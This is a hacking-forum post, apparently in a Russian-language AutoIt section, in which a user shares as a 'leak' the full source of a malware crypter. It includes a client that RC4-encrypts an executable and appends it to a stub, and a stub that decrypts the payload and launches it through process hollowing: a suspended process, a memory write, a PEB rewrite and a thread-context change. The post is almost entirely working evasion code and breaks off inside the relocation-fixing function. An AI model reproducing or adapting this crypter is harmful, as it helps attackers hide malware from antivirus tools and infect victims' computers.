1. Все файлы исключительно загружать на наш сервер в формате .rar или .zip, темы где будут указаны ссылки для загрузки файлов будут удалены.

autoit crypter source 5/59

Тема в разделе "Autoit", создана пользователем rivaldo, 16 ноя 2015.

  1. rivaldo
    Статус
    Оффлайн
    Сообщения:
    101
    Симпатии:
    75
    greetings,

    i am a new forum member and i want to contibrute as much as possible ;)

    my first leak:
    crypter client source:

    Код:
    #AutoIt3Wrapper_Run_Obfuscator=Y
    #Obfuscator_Parameters=/SF /SV /OM /CS=0 /CN=0
    #NoTrayIcon
    #include <ButtonConstants.au3>
    #include <EditConstants.au3>
    #include <GUIConstantsEx.au3>
    #include <StaticConstants.au3>
    #include <WindowsConstants.au3>
    
    $MainForm = GUICreate("Riet crypter", 515, 78, -1, -1)
    $pFileSelectBtn = GUICtrlCreateButton("...", 472, 8, 35, 21)
    $pCryptFileBtn = GUICtrlCreateButton("Crypt", 8, 40, 497, 25)
    $pPathInput = GUICtrlCreateInput("", 8, 8, 457, 21)
    GUISetState(@SW_SHOW)
    
    Func RC4($Data, $Key)
        Local $Opcode = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
        Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]")
        DllStructSetData($CodeBuffer, 1, $Opcode)
        Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
        DllStructSetData($Buffer, 1, $Data)
        DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $Key, "int", 0)
        Local $Ret = DllStructGetData($Buffer, 1)
        $Buffer = 0
        $CodeBuffer = 0
        Return $Ret
    EndFunc   ;==>RC4
    
    While 1
        $nMsg = GUIGetMsg()
        Switch $nMsg
            Case $GUI_EVENT_CLOSE
                Exit
    
            Case $pFileSelectBtn
                GUICtrlSetData($pPathInput, FileOpenDialog("Open file...", @ScriptDir, "Applications (*.exe)"))
    
            Case $pCryptFileBtn
                If GUICtrlRead($pPathInput) = "" Then ;If file not selected then:
                    MsgBox(16, "Error", "Select file first!") ;Showing MessageBox with flag 16 (error)
                    ContinueCase ;And continue case
                EndIf
    
                GuiCtrlSetState($pCryptFileBtn, $GUI_DISABLE) ;Temporary disabling buttons
                GuiCtrlSetState($pFileSelectBtn, $GUI_DISABLE)
    
                $hStub = FileOpen(@ScriptDir & "\Stub.exe", 16) ;Opening stub file in binary mode (flag 16)
                $hFile = FileOpen(GUICtrlRead($pPathInput), 16) ;Opening file to crypt in binary mode too
    
                $sStubData = FileRead($hStub) ;Reading stub and file
                $sFileData = FileRead($hFile)
    
                $sEncryptedFileData = RC4($sFileData, "aaa") ;Encrypting file with using RC4 alg. with key "KeyHere_ChangeIt"
    
                $sResult = FileOpen(FileSaveDialog("Save file as...", @ScriptDir, "Applications (*.exe)"), 18)
    
                FileWrite($sResult, $sStubData) ;Writing stub data
                FileWrite($sResult, StringToBinary("-=L23=-")) ;Inserting binary separator "-=L23=-"
                FileWrite($sResult, $sEncryptedFileData) ;Writing encrypted file data
    
                ; As result file strutcture will be like:
    
                ;===========[Stub data]============;
                ;========[Binary separator]========;
                ;======[Encrypted file data]=======;
    
                FileClose($hStub) ;Close the all handles returned by FileOpen (stub, file, result)
                FileClose($hFile)
                FileClose($sResult)
    
                GuiCtrlSetState($pCryptFileBtn, $GUI_ENABLE) ;Enabling buttons
                GuiCtrlSetState($pFileSelectBtn, $GUI_ENABLE)
    
                MsgBox(64, "Crypter template [L23 - DDoSer]", "Done!") ;Showing final message
        EndSwitch
    WEnd
    stub source:

    Код:
    #Region compile options
    #pragma compile(inputboxres, false) ;Removing inputbox resource form result
    #pragma compile(AutoItExecuteAllowed, false) ;Disabling AutoItExecute function
    #pragma compile(x64, false) ;Compile for x86 systems
    ;#pragma compile(ExecLevel, highestavailable) ;Setting the execution level in the compiled executable manifest (also, u can use this: none, asInvoker, highestAvailable, requireAdministrator)
    #EndRegion
    #NoTrayIcon
    
    
    $sEncryptedData = FileRead(FileOpen(@AutoitExe)) ;Opening itself
    $sSeparatedData = StringMid($sEncryptedData, StringInStr($sEncryptedData, "-=L23=-") + StringLen("-=L23=-")) ;Separating stub data and encrypted data
    $sDecryptedData = RC4($sSeparatedData, "aaa") ;Decrypting data with key "KeyHere_ChangeIt"
    
    _RunBinary(Binary($sDecryptedData)) ;Syntax is: _RunBinary($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe)
    
    Func RC4($Data, $Key)
        Local $Opcode = "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
        Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]")
        DllStructSetData($CodeBuffer, 1, $Opcode)
        Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
        DllStructSetData($Buffer, 1, $Data)
        DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $Key, "int", 0)
        Local $Ret = DllStructGetData($Buffer, 1)
        $Buffer = 0
        $CodeBuffer = 0
        Return $Ret
    EndFunc   ;==>RC4
    
    Func _RunBinary($bBinaryImage, $sCommandLine = "", $sExeModule = @AutoItExe)
        ;#region 1. DETERMINE INTERPRETER TYPE
        Local $fAutoItX64 = @AutoItX64
    
        ;#region 2. PREDPROCESSING PASSED
        Local $bBinary = Binary($bBinaryImage) ; this is redundant but still...
        ; Make structure out of binary data that was passed
        Local $tBinary = DllStructCreate("byte[" & BinaryLen($bBinary) & "]")
        DllStructSetData($tBinary, 1, $bBinary) ; fill it
        ; Get pointer to it
        Local $pPointer = DllStructGetPtr($tBinary)
    
        ;#region 3. CREATING NEW PROCESS
        ; STARTUPINFO structure (actually all that really matters is allocated space)
        Local $tSTARTUPINFO = DllStructCreate("dword cbSize;" & _
                "ptr Reserved;" & _
                "ptr Desktop;" & _
                "ptr Title;" & _
                "dword X;" & _
                "dword Y;" & _
                "dword XSize;" & _
                "dword YSize;" & _
                "dword XCountChars;" & _
                "dword YCountChars;" & _
                "dword FillAttribute;" & _
                "dword Flags;" & _
                "word ShowWindow;" & _
                "word Reserved2;" & _
                "ptr Reserved2;" & _
                "ptr hStdInput;" & _
                "ptr hStdOutput;" & _
                "ptr hStdError")
        ; This is much important. This structure will hold very some important data.
        Local $tPROCESS_INFORMATION = DllStructCreate("ptr Process;" & _
                "ptr Thread;" & _
                "dword ProcessId;" & _
                "dword ThreadId")
        ; Create new process
        Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", _
                "wstr", $sExeModule, _
                "wstr", $sCommandLine, _
                "ptr", 0, _
                "ptr", 0, _
                "int", 0, _
                "dword", 4, _ ; CREATE_SUSPENDED ; <- this is essential
                "ptr", 0, _
                "ptr", 0, _
                "ptr", DllStructGetPtr($tSTARTUPINFO), _
                "ptr", DllStructGetPtr($tPROCESS_INFORMATION))
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed
        ; Get new process and thread handles:
        Local $hProcess = DllStructGetData($tPROCESS_INFORMATION, "Process")
        Local $hThread = DllStructGetData($tPROCESS_INFORMATION, "Thread")
        ; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures)
        If $fAutoItX64 And _RunBinary_IsWow64Process($hProcess) Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(2, 0, 0)
        EndIf
    
        ;#region 4. FILL CONTEXT STRUCTURE
        ; CONTEXT structure is what's really important here. It's processor specific.
        Local $iRunFlag, $tCONTEXT
        If $fAutoItX64 Then
            If @OSArch = "X64" Then
                $iRunFlag = 2
                $tCONTEXT = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & _ ; Register parameter home addresses
                        "dword ContextFlags; dword MxCsr;" & _ ; Control flags
                        "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & _ ; Segment Registers and processor flags
                        "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & _ ; Debug registers
                        "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & _ ; Integer registers
                        "uint64 Rip;" & _ ; Program counter
                        "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & _ ; Floating point state (types are not correct for simplicity reasons!!!)
                        "uint64 VectorRegister[52]; uint64 VectorControl;" & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!)
                        "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") ; Special debug control registers
            Else
                $iRunFlag = 3
                ; FIXME - Itanium architecture
                ; Return special error number:
                DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                Return SetError(102, 0, 0)
            EndIf
        Else
            $iRunFlag = 1
            $tCONTEXT = DllStructCreate("dword ContextFlags;" & _ ; Control flags
                    "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & _ ; CONTEXT_DEBUG_REGISTERS
                    "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & _ ; CONTEXT_FLOATING_POINT
                    "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & _ ; CONTEXT_SEGMENTS
                    "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & _ ; CONTEXT_INTEGER
                    "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & _ ; CONTEXT_CONTROL
                    "byte ExtendedRegisters[512]") ; CONTEXT_EXTENDED_REGISTERS
        EndIf
        ; Define CONTEXT_FULL
        Local $CONTEXT_FULL
        Switch $iRunFlag
            Case 1
                $CONTEXT_FULL = 0x10007
            Case 2
                $CONTEXT_FULL = 0x100007
            Case 3
                $CONTEXT_FULL = 0x80027
        EndSwitch
        ; Set desired access
        DllStructSetData($tCONTEXT, "ContextFlags", $CONTEXT_FULL)
        ; Fill CONTEXT structure:
        $aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", _
                "handle", $hThread, _
                "ptr", DllStructGetPtr($tCONTEXT))
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed
        EndIf
        ; Pointer to PEB structure
        Local $pPEB
        Switch $iRunFlag
            Case 1
                $pPEB = DllStructGetData($tCONTEXT, "Ebx")
            Case 2
                $pPEB = DllStructGetData($tCONTEXT, "Rdx")
            Case 3
                ; FIXME - Itanium architecture
        EndSwitch
    
        ;#region 5. READ PE-FORMAT
        ; Start processing passed binary data. 'Reading' PE format follows.
        ; First is IMAGE_DOS_HEADER
        Local $tIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & _
                "word BytesOnLastPage;" & _
                "word Pages;" & _
                "word Relocations;" & _
                "word SizeofHeader;" & _
                "word MinimumExtra;" & _
                "word MaximumExtra;" & _
                "word SS;" & _
                "word SP;" & _
                "word Checksum;" & _
                "word IP;" & _
                "word CS;" & _
                "word Relocation;" & _
                "word Overlay;" & _
                "char Reserved[8];" & _
                "word OEMIdentifier;" & _
                "word OEMInformation;" & _
                "char Reserved2[20];" & _
                "dword AddressOfNewExeHeader", _
                $pPointer)
        ; Save this pointer value (it's starting address of binary image headers)
        Local $pHEADERS_NEW = $pPointer
        ; Move pointer
        $pPointer += DllStructGetData($tIMAGE_DOS_HEADER, "AddressOfNewExeHeader") ; move to PE file header
        ; Get "Magic"
        Local $sMagic = DllStructGetData($tIMAGE_DOS_HEADER, "Magic")
        ; Check if it's valid format
        If Not ($sMagic == "MZ") Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(4, 0, 0) ; MS-DOS header missing.
        EndIf
        ; In place of IMAGE_NT_SIGNATURE
        Local $tIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $pPointer)
        ; Move pointer
        $pPointer += 4 ; size of $tIMAGE_NT_SIGNATURE structure
        ; Check signature
        If DllStructGetData($tIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then ; IMAGE_NT_SIGNATURE
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(5, 0, 0) ; wrong signature. For PE image should be "PE\0\0" or 17744 dword.
        EndIf
        ; In place of IMAGE_FILE_HEADER
        Local $tIMAGE_FILE_HEADER = DllStructCreate("word Machine;" & _
                "word NumberOfSections;" & _
                "dword TimeDateStamp;" & _
                "dword PointerToSymbolTable;" & _
                "dword NumberOfSymbols;" & _
                "word SizeOfOptionalHeader;" & _
                "word Characteristics", _
                $pPointer)
        ; I could check here if the module is relocatable
        ; Local $fRelocatable
        ; If BitAND(DllStructGetData($tIMAGE_FILE_HEADER, "Characteristics"), 1) Then $fRelocatable = False
        ; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead)
        ; Get number of sections
        Local $iNumberOfSections = DllStructGetData($tIMAGE_FILE_HEADER, "NumberOfSections")
        ; Move pointer
        $pPointer += 20 ; size of $tIMAGE_FILE_HEADER structure
        ; In place of IMAGE_OPTIONAL_HEADER
        Local $tMagic = DllStructCreate("word Magic;", $pPointer)
        Local $iMagic = DllStructGetData($tMagic, 1)
        Local $tIMAGE_OPTIONAL_HEADER
        If $iMagic = 267 Then ; x86 version
            If $fAutoItX64 Then
                DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                Return SetError(6, 0, 0) ; incompatible versions
            EndIf
            $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _
                    "byte MajorLinkerVersion;" & _
                    "byte MinorLinkerVersion;" & _
                    "dword SizeOfCode;" & _
                    "dword SizeOfInitializedData;" & _
                    "dword SizeOfUninitializedData;" & _
                    "dword AddressOfEntryPoint;" & _
                    "dword BaseOfCode;" & _
                    "dword BaseOfData;" & _
                    "dword ImageBase;" & _
                    "dword SectionAlignment;" & _
                    "dword FileAlignment;" & _
                    "word MajorOperatingSystemVersion;" & _
                    "word MinorOperatingSystemVersion;" & _
                    "word MajorImageVersion;" & _
                    "word MinorImageVersion;" & _
                    "word MajorSubsystemVersion;" & _
                    "word MinorSubsystemVersion;" & _
                    "dword Win32VersionValue;" & _
                    "dword SizeOfImage;" & _
                    "dword SizeOfHeaders;" & _
                    "dword CheckSum;" & _
                    "word Subsystem;" & _
                    "word DllCharacteristics;" & _
                    "dword SizeOfStackReserve;" & _
                    "dword SizeOfStackCommit;" & _
                    "dword SizeOfHeapReserve;" & _
                    "dword SizeOfHeapCommit;" & _
                    "dword LoaderFlags;" & _
                    "dword NumberOfRvaAndSizes", _
                    $pPointer)
            ; Move pointer
            $pPointer += 96 ; size of $tIMAGE_OPTIONAL_HEADER
        ElseIf $iMagic = 523 Then ; x64 version
            If Not $fAutoItX64 Then
                DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                Return SetError(6, 0, 0) ; incompatible versions
            EndIf
            $tIMAGE_OPTIONAL_HEADER = DllStructCreate("word Magic;" & _
                    "byte MajorLinkerVersion;" & _
                    "byte MinorLinkerVersion;" & _
                    "dword SizeOfCode;" & _
                    "dword SizeOfInitializedData;" & _
                    "dword SizeOfUninitializedData;" & _
                    "dword AddressOfEntryPoint;" & _
                    "dword BaseOfCode;" & _
                    "uint64 ImageBase;" & _
                    "dword SectionAlignment;" & _
                    "dword FileAlignment;" & _
                    "word MajorOperatingSystemVersion;" & _
                    "word MinorOperatingSystemVersion;" & _
                    "word MajorImageVersion;" & _
                    "word MinorImageVersion;" & _
                    "word MajorSubsystemVersion;" & _
                    "word MinorSubsystemVersion;" & _
                    "dword Win32VersionValue;" & _
                    "dword SizeOfImage;" & _
                    "dword SizeOfHeaders;" & _
                    "dword CheckSum;" & _
                    "word Subsystem;" & _
                    "word DllCharacteristics;" & _
                    "uint64 SizeOfStackReserve;" & _
                    "uint64 SizeOfStackCommit;" & _
                    "uint64 SizeOfHeapReserve;" & _
                    "uint64 SizeOfHeapCommit;" & _
                    "dword LoaderFlags;" & _
                    "dword NumberOfRvaAndSizes", _
                    $pPointer)
            ; Move pointer
            $pPointer += 112 ; size of $tIMAGE_OPTIONAL_HEADER
        Else
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(6, 0, 0) ; incompatible versions
        EndIf
        ; Extract entry point address
        Local $iEntryPointNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint") ; if loaded binary image would start executing at this address
        ; And other interesting informations
        Local $iOptionalHeaderSizeOfHeadersNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
        Local $pOptionalHeaderImageBaseNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "ImageBase") ; address of the first byte of the image when it's loaded in memory
        Local $iOptionalHeaderSizeOfImageNEW = DllStructGetData($tIMAGE_OPTIONAL_HEADER, "SizeOfImage") ; the size of the image including all headers
        ; Move pointer
        $pPointer += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT
        $pPointer += 8 ; size of $tIMAGE_DIRECTORY_ENTRY_IMPORT
        $pPointer += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY
        ; Base Relocation Directory
        Local $tIMAGE_DIRECTORY_ENTRY_BASERELOC = DllStructCreate("dword VirtualAddress; dword Size", $pPointer)
        ; Collect data
        Local $pAddressNewBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "VirtualAddress")
        Local $iSizeBaseReloc = DllStructGetData($tIMAGE_DIRECTORY_ENTRY_BASERELOC, "Size")
        Local $fRelocatable
        If $pAddressNewBaseReloc And $iSizeBaseReloc Then $fRelocatable = True
        ;If Not $fRelocatable Then MsgBox(48, "Warning!", "NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!") ; nothing can be done here
        ; Move pointer
        $pPointer += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them).
    
        ;#region 6. ALLOCATE 'NEW' MEMORY SPACE
        Local $fRelocate
        Local $pZeroPoint
        If $fRelocatable Then ; If the module can be relocated then allocate memory anywhere possible
            $pZeroPoint = _RunBinary_AllocateExeSpace($hProcess, $iOptionalHeaderSizeOfImageNEW)
            ; In case of failure try at original address
            If @error Then
                $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
                If @error Then
                    _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW)
                    ; Try now
                    $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
                    If @error Then
                        ; Return special error number:
                        DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                        Return SetError(101, 1, 0)
                    EndIf
                EndIf
            EndIf
            $fRelocate = True
        Else ; And if not try where it should be
            $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
            If @error Then
                _RunBinary_UnmapViewOfSection($hProcess, $pOptionalHeaderImageBaseNEW)
                ; Try now
                $pZeroPoint = _RunBinary_AllocateExeSpaceAtAddress($hProcess, $pOptionalHeaderImageBaseNEW, $iOptionalHeaderSizeOfImageNEW)
                If @error Then
                    ; Return special error number:
                    DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
                    Return SetError(101, 0, 0)
                EndIf
            EndIf
        EndIf
        ; If there is new ImageBase value, save it
        DllStructSetData($tIMAGE_OPTIONAL_HEADER, "ImageBase", $pZeroPoint)
    
        ;#region 7. CONSTRUCT THE NEW MODULE
        ; Allocate enough space (in our space) for the new module
        Local $tModule = DllStructCreate("byte[" & $iOptionalHeaderSizeOfImageNEW & "]")
        ; Get pointer
        Local $pModule = DllStructGetPtr($tModule)
        ; Headers
        Local $tHeaders = DllStructCreate("byte[" & $iOptionalHeaderSizeOfHeadersNEW & "]", $pHEADERS_NEW)
        ; Write headers to $tModule
        DllStructSetData($tModule, 1, DllStructGetData($tHeaders, 1))
        ; Write sections now. $pPointer is currently in place of sections
        Local $tIMAGE_SECTION_HEADER
        Local $iSizeOfRawData, $pPointerToRawData
        Local $iVirtualAddress, $iVirtualSize
        Local $tRelocRaw
        ; Loop through sections
        For $i = 1 To $iNumberOfSections
            $tIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & _
                    "dword UnionOfVirtualSizeAndPhysicalAddress;" & _
                    "dword VirtualAddress;" & _
                    "dword SizeOfRawData;" & _
                    "dword PointerToRawData;" & _
                    "dword PointerToRelocations;" & _
                    "dword PointerToLinenumbers;" & _
                    "word NumberOfRelocations;" & _
                    "word NumberOfLinenumbers;" & _
                    "dword Characteristics", _
                    $pPointer)
            ; Collect data
            $iSizeOfRawData = DllStructGetData($tIMAGE_SECTION_HEADER, "SizeOfRawData")
            $pPointerToRawData = $pHEADERS_NEW + DllStructGetData($tIMAGE_SECTION_HEADER, "PointerToRawData")
            $iVirtualAddress = DllStructGetData($tIMAGE_SECTION_HEADER, "VirtualAddress")
            $iVirtualSize = DllStructGetData($tIMAGE_SECTION_HEADER, "UnionOfVirtualSizeAndPhysicalAddress")
            If $iVirtualSize And $iVirtualSize < $iSizeOfRawData Then $iSizeOfRawData = $iVirtualSize
            ; If there is data to write, write it
            If $iSizeOfRawData Then
                DllStructSetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pModule + $iVirtualAddress), 1, DllStructGetData(DllStructCreate("byte[" & $iSizeOfRawData & "]", $pPointerToRawData), 1))
            EndIf
            ; Relocations
            If $fRelocate Then
                If $iVirtualAddress <= $pAddressNewBaseReloc And $iVirtualAddress + $iSizeOfRawData > $pAddressNewBaseReloc Then
                    $tRelocRaw = DllStructCreate("byte[" & $iSizeBaseReloc & "]", $pPointerToRawData + ($pAddressNewBaseReloc - $iVirtualAddress))
                EndIf
            EndIf
            ; Move pointer
            $pPointer += 40 ; size of $tIMAGE_SECTION_HEADER structure
        Next
        ; Fix relocations
        If $fRelocate Then _RunBinary_FixReloc($pModule, $tRelocRaw, $pZeroPoint, $pOptionalHeaderImageBaseNEW, $iMagic = 523)
        ; Write newly constructed module to allocated space inside the $hProcess
        $aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", _
                "handle", $hProcess, _
                "ptr", $pZeroPoint, _
                "ptr", $pModule, _
                "dword_ptr", $iOptionalHeaderSizeOfImageNEW, _
                "dword_ptr*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(7, 0, 0) ; WriteProcessMemory function or call to it while writting new module binary
        EndIf
    
        ;#region 8. PEB ImageBaseAddress MANIPULATION
        ; PEB structure definition
        Local $tPEB = DllStructCreate("byte InheritedAddressSpace;" & _
                "byte ReadImageFileExecOptions;" & _
                "byte BeingDebugged;" & _
                "byte Spare;" & _
                "ptr Mutant;" & _
                "ptr ImageBaseAddress;" & _
                "ptr LoaderData;" & _
                "ptr ProcessParameters;" & _
                "ptr SubSystemData;" & _
                "ptr ProcessHeap;" & _
                "ptr FastPebLock;" & _
                "ptr FastPebLockRoutine;" & _
                "ptr FastPebUnlockRoutine;" & _
                "dword EnvironmentUpdateCount;" & _
                "ptr KernelCallbackTable;" & _
                "ptr EventLogSection;" & _
                "ptr EventLog;" & _
                "ptr FreeList;" & _
                "dword TlsExpansionCounter;" & _
                "ptr TlsBitmap;" & _
                "dword TlsBitmapBits[2];" & _
                "ptr ReadOnlySharedMemoryBase;" & _
                "ptr ReadOnlySharedMemoryHeap;" & _
                "ptr ReadOnlyStaticServerData;" & _
                "ptr AnsiCodePageData;" & _
                "ptr OemCodePageData;" & _
                "ptr UnicodeCaseTableData;" & _
                "dword NumberOfProcessors;" & _
                "dword NtGlobalFlag;" & _
                "byte Spare2[4];" & _
                "int64 CriticalSectionTimeout;" & _
                "dword HeapSegmentReserve;" & _
                "dword HeapSegmentCommit;" & _
                "dword HeapDeCommitTotalFreeThreshold;" & _
                "dword HeapDeCommitFreeBlockThreshold;" & _
                "dword NumberOfHeaps;" & _
                "dword MaximumNumberOfHeaps;" & _
                "ptr ProcessHeaps;" & _
                "ptr GdiSharedHandleTable;" & _
                "ptr ProcessStarterHelper;" & _
                "ptr GdiDCAttributeList;" & _
                "ptr LoaderLock;" & _
                "dword OSMajorVersion;" & _
                "dword OSMinorVersion;" & _
                "dword OSBuildNumber;" & _
                "dword OSPlatformId;" & _
                "dword ImageSubSystem;" & _
                "dword ImageSubSystemMajorVersion;" & _
                "dword ImageSubSystemMinorVersion;" & _
                "dword GdiHandleBuffer[34];" & _
                "dword PostProcessInitRoutine;" & _
                "dword TlsExpansionBitmap;" & _
                "byte TlsExpansionBitmapBits[128];" & _
                "dword SessionId")
        ; Fill the structure
        $aCall = DllCall("kernel32.dll", "bool", "ReadProcessMemory", _
                "ptr", $hProcess, _
                "ptr", $pPEB, _ ; pointer to PEB structure
                "ptr", DllStructGetPtr($tPEB), _
                "dword_ptr", DllStructGetSize($tPEB), _
                "dword_ptr*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
        EndIf
        ; Change base address within PEB
        DllStructSetData($tPEB, "ImageBaseAddress", $pZeroPoint)
        ; Write the changes
        $aCall = DllCall("kernel32.dll", "bool", "WriteProcessMemory", _
                "handle", $hProcess, _
                "ptr", $pPEB, _
                "ptr", DllStructGetPtr($tPEB), _
                "dword_ptr", DllStructGetSize($tPEB), _
                "dword_ptr*", 0)
        ; Check for errors or failure
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(9, 0, 0) ; WriteProcessMemory function or call to it failed while changing base address
        EndIf
    
        ;#region 9. NEW ENTRY POINT
        ; Entry point manipulation
        Switch $iRunFlag
            Case 1
                DllStructSetData($tCONTEXT, "Eax", $pZeroPoint + $iEntryPointNEW)
            Case 2
                DllStructSetData($tCONTEXT, "Rcx", $pZeroPoint + $iEntryPointNEW)
            Case 3
                ; FIXME - Itanium architecture
        EndSwitch
    
        ;#region 10. SET NEW CONTEXT
        ; New context:
        $aCall = DllCall("kernel32.dll", "bool", "SetThreadContext", _
                "handle", $hThread, _
                "ptr", DllStructGetPtr($tCONTEXT))
    
        If @error Or Not $aCall[0] Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
        EndIf
    
        ;#region 11. RESUME THREAD
        ; And that's it!. Continue execution:
        $aCall = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $hThread)
        ; Check for errors or failure
        If @error Or $aCall[0] = -1 Then
            DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hProcess, "dword", 0)
            Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
        EndIf
    
        ;#region 12. CLOSE OPEN HANDLES AND RETURN PID
        DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hProcess)
        DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hThread)
        ; All went well. Return new PID:
        Return DllStructGetData($tPROCESS_INFORMATION, "ProcessId")
    
    EndFunc   ;==>_RunBinary
    
    
    Func _RunBinary_FixReloc($pModule, $tData, $pAddressNew, $pAddressOld, $fImageX64)
        ; Applies an image's base-relocation table after the image was placed at an address
        ; other than the one it was linked for: every relocation entry of the expected type
        ; has the base difference added to the pointer it refers to.
        ; $pModule     - base of the image whose pointers are patched (entries resolve to $pModule + page RVA + offset)
        ; $tData       - DllStruct holding the raw relocation data (a sequence of IMAGE_BASE_RELOCATION blocks)
